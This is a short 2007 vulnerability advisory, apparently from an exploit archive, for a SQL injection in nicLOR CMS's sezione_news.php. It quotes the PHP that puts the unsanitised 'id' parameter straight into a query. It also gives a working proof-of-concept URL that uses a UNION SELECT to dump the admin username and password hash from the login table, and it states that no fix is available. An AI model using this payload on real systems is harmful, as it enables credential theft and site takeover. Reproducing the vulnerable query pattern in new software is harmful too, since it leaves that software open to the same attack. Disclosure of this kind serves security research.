nicLOR CMS (sezione_news.php) Remote SQL Injection Vulnerability

2007-12-21 00:00:00

Name : nicLOR-CMS SQL Injection Vulnerability.
Author : x0kster
Email : [email protected]
Script Download : http://www.niclor.net/prodotti/16-04-06-niclor_cms.zip
Date : 21/12/2007

#SQL Injection in sezione_news.php

<?php
[...]
$intSezioneID = $_GET['id'];
[...]
$strSQL = "SELECT articolo.intArticoloID, "
. "[...]"
. " HAVING articolo.intSezioneID = $intSezioneID"
. "[...]";
[...]
?>

So we can exploit the $intSezioneID and execute an sql injection.

PoC:
http://example.com/nicLOR-CMS/index.php?page=sezione&id=-1+union+select+1,concat(strUser,0x3a,strPass)+from+login/*

And then we'll get the username and the hash of the admin.

#

Fixes

No fixes

In order to submit a new fix you need to be registered.